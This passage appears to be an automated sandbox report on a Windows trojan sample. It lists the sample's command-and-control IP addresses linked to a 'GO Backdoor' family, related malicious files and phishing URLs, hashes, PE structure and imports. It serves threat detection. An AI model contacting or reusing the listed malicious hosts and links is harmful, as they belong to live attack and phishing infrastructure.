http://46.8.232.106/	false	unknown
http://46.8.236.61/	false	unknown
http://93.185.159.253/	false	unknown
http://188.130.206.243/	false	unknown
http://91.212.166.91/	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://188.130.206.243hI9utaoLtvGDps7s:m48/wSt/VxX44Hg627u.NAl8A8N.iqg2fpG3fDp2uKh.zcx11On0EJs6H75	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://46.8.232.106	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1BA000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://188.130.206.243http://46.8.232.106	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C122000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://188.130.206.243	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1BA000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://93.185.159.253	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://46.8.236.61	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen	SecuriteInfo.com.FileRepMalware.7838.24766.exe	false	unknown
http://s.360safe.com/safei18n/	SecuriteInfo.com.FileRepMalware.7838.24766.exe	false	unknown
http://91.212.166.91	SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	false	unknown
https://store.360totalsecurity.com/	shared.xml	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
46.8.232.106	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	false
188.130.206.243	unknown	Russian Federation	200509	SVINT-ASNES	false
88.218.60.50	unknown	Russian Federation	20655	E-STYLEISP-ASRU	true
93.185.159.253	unknown	Russian Federation	39912	I3B-ASAT	false
91.212.166.91	unknown	United Kingdom	35819	MOBILY-ASEtihadEtisalatCompanyMobilySA	false
46.8.236.61	unknown	Russian Federation	28917	FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1543364
Start date and time:	2024-10-27 18:42:31 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.FileRepMalware.7838.24766.exe
Detection:	MAL
Classification:	mal72.troj.evad.winEXE@1/1@0/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 78% Number of executed functions: 82 Number of non-executed functions: 226
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
VT rate limit hit for: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
46.8.232.106	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	sV9ElC4fU4.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	5ndBtx7pRX.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	5ndBtx7pRX.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
	GoogleInstaller.exe	Get hash	malicious	GO Backdoor	Browse	46.8.232.106/
188.130.206.243	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243/
93.185.159.253	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	sV9ElC4fU4.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	5ndBtx7pRX.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	5ndBtx7pRX.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/
	GoogleInstaller.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SVINT-ASNES	https://t.ly/BavariaFilmGmbH2410	Get hash	malicious	Unknown	Browse	188.130.206.243
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	188.130.206.243
	na.elf	Get hash	malicious	Mirai, Moobot	Browse	188.130.200.140
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	nabspc.elf	Get hash	malicious	Unknown	Browse	109.248.104.45
	https://t.ly/BavariaFilmGmbH2410	Get hash	malicious	Unknown	Browse	46.8.232.106
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	185.16.116.131
	https://t.ly/ZPR23.10	Get hash	malicious	Unknown	Browse	46.8.232.106
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	46.8.228.109
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	46.8.236.61
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	46.8.236.61
	SecuriteInfo.com.Win32.PWSX-gen.31473.14481.exe	Get hash	malicious	Stealc, Vidar	Browse	46.8.231.109
	NmN91TzzQT.exe	Get hash	malicious	Stealc, Vidar	Browse	46.8.231.109
	mD9WPbCEgK.exe	Get hash	malicious	Stealc, Vidar	Browse	46.8.231.109
E-STYLEISP-ASRU	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	217.197.116.188
	SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exe	Get hash	malicious	Unknown	Browse	217.197.116.188
	https://shoutout.wix.com/so/57P4LPRB3/c?w=QyObRC2ER359WwNEkFtFRIXvHqRVLYBWPJZndFVxaFM.eyJ1IjoiaHR0cHM6Ly90LmNvL2dYUTZ1aVRTYzQiLCJyIjoiNzk1YmZlN2YtZDJkZS00NTQzLTkwODItYWRmOTcyNmMzMTVjIiwibSI6Im1haWwiLCJjIjoiMDAwMDAwMDAtMDAwMC0wMDAwLTAwMDAtMDAwMDAwMDAwMDAwIn0	Get hash	malicious	Phisher	Browse	185.147.127.81
	http://exhibitprosper.com/r5K0.aspx?4XVH7cbbbd9tkD1cc3JlHcwglSchg7pcmcpJJhf9sc	Get hash	malicious	Phisher	Browse	185.147.127.69
	https://www.leaflogistic.co/	Get hash	malicious	HTMLPhisher	Browse	185.147.127.36
	https://www.naklico.com	Get hash	malicious	Unknown	Browse	185.147.127.36
	https://www.naklico.com/	Get hash	malicious	Phisher	Browse	185.147.127.36
	https://www.naklico.com/	Get hash	malicious	Phisher	Browse	185.147.127.36
	https://www.leaflogistic.co/	Get hash	malicious	HTMLPhisher	Browse	185.147.127.36
	http://exhibitprosper.com/r5K0.aspx?4XVH7cbbbd9tkD1cc3JlHcwglSchg7pcmcpJJhf9sc	Get hash	malicious	Phisher	Browse	185.147.127.69
I3B-ASAT	https://t.ly/BavariaFilmGmbH2410	Get hash	malicious	Unknown	Browse	93.185.159.253
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	BwqqVoHR71.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	botnet.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	78.142.85.12
	sV9ElC4fU4.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	antispam_connect1.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	wa_3rd_party_host_32.exe	Get hash	malicious	GO Backdoor	Browse	93.185.159.253
	3wtD2jXnxy.exe	Get hash	malicious	RedLine, STRRAT	Browse	93.185.156.125

Process:	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe
File Type:	data
Category:	dropped
Size (bytes):	416
Entropy (8bit):	6.303487257885365
Encrypted:	false
SSDEEP:	6:MlrBBnh+UY27GHAsz6y8Ic+T+GhPFC6XgY64meu+/L7vKMxZXa1WSHfzIll93tcC:Ml1/+z2sBmYcAnwjON+CN8/M1L
MD5:	0A62A113910AC0070CF81D89484A4ACF
SHA1:	05FC465BBF20EDE8C605F19D6BD662788292CB21
SHA-256:	1D1D1C243EDBB83CB4536A414785DE6483F0C4C0AC00171A071AF52C4352697C
SHA-512:	4C47E17ED1BBF26EFEAC60F7AF0C826A9346B0016CDB4BB8BC5DDDB5CC6FBB2A2573633D9F092493815B2B9E3A86A83E34E3ADBE487202044786D2BA6E1382E2
Malicious:	false
Reputation:	low
Preview:	.&W....#...#..Y.S.WWA.:.L9.>]S+.XT^.M!/.Q&[!@...Q..!Z.'.\.".M...XV,.^##.U'YSE4,Z.....X...$7,.."6Y.[4F,.;A.+.W7]/_...@Y.[.%.G0.-\1..P.X._.!.@.!.U# X&1[B).?...3..."..>...,'S4)&A...L>^.P"W.]<3.M;_.X26.V_8,V76.G 9>_$_.V##.P.3Y@.!.Q...\V.;]...O....=,'.0==.:..U.+T-..L..6F.,.W$%VR.!.G)..\.=6R...["4&@..TR_W._.9YX.PM=+.P..._.&5O.7_...Z.3;S.....-..T.!VL]%.F.3\_...[(. Q+;.@.Q.R..4Z)W.^'.M!\.[%..^7.U8^"GT..\+&UW7:'Z...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.35539101214803
TrID:	Win32 Executable (generic) a (10002005/4) 99.55% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.FileRepMalware.7838.24766.exe
File size:	8'931'328 bytes
MD5:	bdafcaf9ecd3f3310417e90d91e3e0fc
SHA1:	01ea5e3b71bd4e60dbf4be286f307712691f739f
SHA256:	514e8fc85ea7e17bc156b20c6ee967d290c030958bfc038a3e0ef065d28a0037
SHA512:	18acc786d47a75d226bd893fed820974b5ede7ca3f85aa17093799b87497f6dece2f0daf4a26f030c2c31a52685ae3693f5e07d9a503c185ee043e1ffab4a934
SSDEEP:	98304:x3joQ1BOiPf/q2W29JatMqtI5I2BihgtQ8JLNdKgZjm2IJiI:rOiW29JaN4vtQ8Jhd/9m2ef
TLSH:	FB969CAB09076DC5EEF48F719769E99643D6C463B93CC1BABB4764A8C212BC344E03D4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.......,.......,...B...,...A...,...W...,...-...,.......,.....i.,.......,.......,.......,.......,.Rich..,........

File Icon


Icon Hash:	615545d4aaa2d423

Static PE Info

General

Entrypoint:	0x48eb4e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F92B0F1 [Fri Oct 23 10:31:13 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	44c9a0d6caae769769c87976fb6f71d4

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007FBB808645B9h
jmp 00007FBB8085640Eh
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ebx
mov eax, dword ptr [ebp+0Ch]
add eax, 0Ch
mov dword ptr [ebp-04h], eax
mov ebx, dword ptr fs:[00000000h]
mov eax, dword ptr [ebx]
mov dword ptr fs:[00000000h], eax
mov eax, dword ptr [ebp+08h]
mov ebx, dword ptr [ebp+0Ch]
mov ebp, dword ptr [ebp-04h]
mov esp, dword ptr [ebx-04h]
jmp eax
pop ebx
leave
retn 0008h
pop eax
pop ecx
xchg dword ptr [esp], eax
jmp eax
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, dword ptr fs:[00000000h]
mov dword ptr [ebp-04h], esi
mov dword ptr [ebp-08h], 0048EBBCh
push 00000000h
push dword ptr [ebp+0Ch]
push dword ptr [ebp-08h]
push dword ptr [ebp+08h]
call 00007FBB8086F063h
mov eax, dword ptr [ebp+0Ch]
mov eax, dword ptr [eax+04h]
and eax, FFFFFFFDh
mov ecx, dword ptr [ebp+0Ch]
mov dword ptr [ecx+04h], eax
mov edi, dword ptr fs:[00000000h]
mov ebx, dword ptr [ebp-04h]
mov dword ptr [ebx], edi
mov dword ptr fs:[00000000h], ebx
pop edi
pop esi
pop ebx
leave
retn 0008h
push ebp
mov ebp, esp
sub esp, 08h
push ebx
push esi
push edi
cld
mov dword ptr [ebp-04h], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [ebp-04h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FBB8086517Dh
add esp, 20h
mov dword ptr [ebp-08h], eax
pop edi
pop esi
pop ebx
mov eax, dword ptr [ebp+00h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[C++] VS2005 build 50727
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd771c	0x190	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe9000	0x7a4f5c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x123898	0x37a8	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11b000	0x9dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb8c10	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xc6720	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb8000	0x8ac	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb7000	0xb6c00	209499c11726f362ccd66f1fbadf0dd2	False	0.5103921746751026	data	6.788533709823602	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb8000	0x23000	0x22800	eb91e1596f235b3413d6fa622b45c87a	False	0.32765794836956524	data	4.672379036995675	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xdb000	0xe000	0x6000	d2bdce02712eb535a94a1cb6ac8c2cc2	False	0.2332763671875	OpenPGP Public Key	4.3556072570206315	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xe9000	0x7a4f5c	0x7a5000	8b7f3388e967a18ee092b53483e8558f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
UIDATA	0xe93c4	0x29e4a	Zip archive data, at least v1.0 to extract, compression method=store	English	United States	0.14798885741925707
UIDATA	0x113210	0x1774	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	English	United States	0.14723517654896737
UIDATA	0x114984	0x10be	Unicode text, UTF-16, little-endian text, with CRLF line terminators	English	United States	0.1532897806812879
RT_ICON	0x115a44	0xaae0	PC bitmap, Windows 3.x format, 6329 x 2 x 41, image size 44655, cbSize 43744, bits offset 54			0.5107671909290417
RT_ICON	0x120524	0x86ee	PC bitmap, Windows 3.x format, 4542 x 2 x 53, image size 34904, cbSize 34542, bits offset 54			0.422992299229923
RT_ICON	0x128c14	0x3e9b	PC bitmap, Windows 3.x format, 2443 x 2 x 46, image size 16391, cbSize 16027, bits offset 54			0.4940413052973108
RT_ICON	0x12cab0	0x1817d	PC bitmap, Windows 3.x format, 12386 x 2 x 41, image size 98844, cbSize 98685, bits offset 54			0.4911992704058368
RT_ICON	0x144c30	0x744436	PC bitmap, Windows 3.x format, 952869 x 2 x 45, image size 7620119, cbSize 7619638, bits offset 54			0.6403331756591797
RT_ICON	0x889068	0xffb	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8944023466145197
RT_ICON	0x88a064	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.04948132780082987
RT_ICON	0x88c60c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.0825515947467167
RT_ICON	0x88d6b4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.19858156028368795
RT_RCDATA	0x88db1c	0x80	data	English	United States	1.0859375
RT_GROUP_ICON	0x88db9c	0x3e	data	English	United States	0.8064516129032258
RT_VERSION	0x88dbdc	0x380	data	English	United States	0.43191964285714285

Imports

DLL	Import
KERNEL32.dll	ExitThread, CreateThread, ExitProcess, GetStartupInfoW, RtlUnwind, HeapReAlloc, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LCMapStringW, GetStdHandle, GetModuleFileNameA, GetTimeFormatA, GetDateFormatA, HeapCreate, HeapDestroy, VirtualFree, VirtualAlloc, GetConsoleCP, GetConsoleMode, LCMapStringA, SetHandleCount, GetFileType, GetStartupInfoA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetStringTypeA, GetStringTypeW, IsDebuggerPresent, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, GetProcessHeap, CreateFileA, SetEnvironmentVariableA, SetUnhandledExceptionFilter, HeapAlloc, TerminateProcess, GetFileSizeEx, LocalFileTimeToFileTime, GetLocaleInfoW, CompareStringA, GetShortPathNameW, SetEndOfFile, FlushFileBuffers, GlobalFlags, GlobalAddAtomW, GlobalFindAtomW, lstrcmpiA, GetTempFileNameW, OpenMutexW, ReleaseMutex, HeapWalk, HeapLock, OpenThread, HeapUnlock, OutputDebugStringW, SetFilePointerEx, IsProcessorFeaturePresent, GlobalDeleteAtom, LoadLibraryA, GetVersionExA, UnhandledExceptionFilter, HeapFree, lstrlenA, lstrcmpA, CompareStringW, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetFullPathNameW, GetLogicalDriveStringsW, DeviceIoControl, InterlockedExchange, MoveFileW, GetFileAttributesW, RemoveDirectoryW, FindClose, FindNextFileW, FindFirstFileW, QueryPerformanceCounter, SetFileAttributesW, lstrcmpW, GlobalAlloc, GlobalLock, GlobalUnlock, SetErrorMode, SetEnvironmentVariableW, GetCommandLineW, ExpandEnvironmentStringsW, lstrcmpiW, lstrlenW, SetFilePointer, InterlockedIncrement, ProcessIdToSessionId, FreeResource, GetSystemWindowsDirectoryW, LocalAlloc, SystemTimeToFileTime, GetModuleHandleA, GetTimeZoneInformation, LocalFree, GlobalFree, CreateMutexW, FreeConsole, GetCurrentProcessId, LoadLibraryExW, GetTempPathW, GetDriveTypeW, GetWindowsDirectoryW, GetUserDefaultUILanguage, SetCurrentDirectoryW, GetPrivateProfileStringW, GetPrivateProfileSectionW, GetPrivateProfileSectionNamesW, Sleep, InterlockedCompareExchange, GetVersionExW, GetModuleFileNameW, MultiByteToWideChar, WriteFile, ReadFile, GetFileSize, CreateFileW, CopyFileW, FreeLibrary, LoadLibraryW, GetModuleHandleW, GetProcAddress, InterlockedDecrement, MulDiv, GetCurrentProcess, SetEvent, CreateEventW, ResetEvent, GetTickCount, WaitForSingleObject, WideCharToMultiByte, GetSystemTimeAsFileTime, DeleteFileW, GetVersion, GetSystemDirectoryW, SetLastError, RaiseException, DeleteCriticalSection, InitializeCriticalSection, CreateProcessW, GetLastError, OpenProcess, FindResourceExW, FindResourceW, LoadResource, LockResource, SizeofResource, CloseHandle, LeaveCriticalSection, EnterCriticalSection, GetCurrentThreadId, FlushInstructionCache, GetUserDefaultLCID
USER32.dll	GetWindowTextW, GetWindowTextLengthW, RedrawWindow, DrawTextW, DispatchMessageW, TranslateMessage, GetMessageW, SetWindowTextW, GetWindow, MonitorFromWindow, MapWindowPoints, IsRectEmpty, IsDialogMessageW, GetClientRect, DrawIconEx, DestroyIcon, GetActiveWindow, MessageBoxW, InvalidateRect, MonitorFromRect, PostQuitMessage, UnhookWindowsHookEx, GetLastActivePopup, GetSubMenu, GetMenuItemCount, GetMenuItemID, GetMenuState, ValidateRect, CallNextHookEx, SetWindowsHookExW, GetSysColorBrush, CheckMenuItem, EnableMenuItem, ModifyMenuW, SetCursor, GetDlgCtrlID, GetKeyState, GetWindowDC, BeginPaint, LoadBitmapW, SetWindowLongW, GetWindowLongW, DefWindowProcW, CallWindowProcW, GetWindowThreadProcessId, FindWindowW, SendMessageTimeoutW, IsWindow, KillTimer, GetMenuCheckMarkDimensions, DestroyWindow, GetWindowPlacement, ShowWindow, SetTimer, IsWindowVisible, RegisterClassExW, GetClassInfoExW, SetMenu, GetMessageTime, GetTopWindow, RemovePropW, GetPropW, SetPropW, GetCapture, WinHelpW, DestroyMenu, TabbedTextOutW, DrawTextExW, GrayStringW, EndPaint, SetCapture, ReleaseCapture, GetClassLongW, SetClassLongW, BringWindowToTop, SwitchToThisWindow, GetSystemMetrics, CharNextW, PeekMessageW, DestroyAcceleratorTable, InvalidateRgn, FillRect, CreateAcceleratorTableW, GetSysColor, GetClassNameW, GetDlgItem, IsChild, LoadImageW, LoadIconW, GetDesktopWindow, LoadCursorW, CreateWindowExW, EnableWindow, GetParent, SendMessageW, SetWindowPos, LoadStringW, UnregisterClassA, SetFocus, IsWindowEnabled, SetRectEmpty, RegisterWindowMessageW, GetDC, ReleaseDC, GetFocus, CopyRect, OffsetRect, ClientToScreen, GetMessagePos, PtInRect, ScreenToClient, MoveWindow, GetWindowRect, GetMonitorInfoW, AllowSetForegroundWindow, GetForegroundWindow, AttachThreadInput, SetForegroundWindow, SetActiveWindow, SetMenuItemBitmaps, IsIconic, SystemParametersInfoA, GetMenu, AdjustWindowRectEx, RegisterClassW, PostMessageW, GetKeyboardState, keybd_event, GetClassInfoW
GDI32.dll	ScaleWindowExtEx, PtVisible, SetWindowExtEx, SetMapMode, RestoreDC, SaveDC, ExtTextOutW, GetClipBox, CreateBitmap, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, Escape, TextOutW, RectVisible, GetStockObject, BitBlt, SetViewportOrgEx, GetPixel, CreateCompatibleBitmap, CreateFontW, SetTextColor, SetBkColor, CreateSolidBrush, GetTextExtentPoint32W, GetTextMetricsW, GetObjectA, GetObjectW, SelectObject, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps
WINSPOOL.DRV	ClosePrinter, DocumentPropertiesW, OpenPrinterW
ADVAPI32.dll	RegOpenKeyExA, ConvertSidToStringSidW, RegQueryValueExA, RegDeleteValueW, RegEnumKeyExW, RegQueryInfoKeyW, RegDeleteKeyW, GetSidSubAuthority, GetTokenInformation, OpenProcessToken, RegCreateKeyExW, RegSetValueExW, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegEnumKeyExA
SHELL32.dll	SHOpenFolderAndSelectItems, SHGetMalloc, SHGetSpecialFolderLocation, DragAcceptFiles, DragFinish, DragQueryFileW, SHGetFileInfoW, ShellExecuteExW, ShellExecuteW, SHGetPathFromIDListW, SHGetSpecialFolderPathW, SHGetFolderPathW
ole32.dll	OleLockRunning, StringFromGUID2, OleUninitialize, OleInitialize, CoCreateInstance, CoTaskMemAlloc, CoTaskMemRealloc, CoTaskMemFree, CoInitialize, CoUninitialize, CoGetClassObject, CLSIDFromProgID, CLSIDFromString, CreateStreamOnHGlobal
OLEAUT32.dll	VariantChangeType, LoadTypeLib, LoadRegTypeLib, SysStringLen, OleCreateFontIndirect, VarUI4FromStr, SysAllocStringLen, VarBstrCmp, SafeArrayUnlock, SafeArrayLock, SafeArrayDestroy, SafeArrayCreate, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopy, SafeArrayCopy, SafeArrayGetVartype, DispCallFunc, VariantInit, VariantClear, SysAllocString, SysFreeString
SHLWAPI.dll	StrCmpIW, PathCompactPathW, PathStripPathW, PathFindFileNameW, PathIsDirectoryW, PathAddBackslashW, StrStrIW, PathRemoveFileSpecW, PathAppendW, PathCombineW, SHSetValueA, SHGetValueA, PathFileExistsW, ColorHLSToRGB, ColorRGBToHLS, SHGetValueW, wnsprintfW
COMCTL32.dll	InitCommonControlsEx
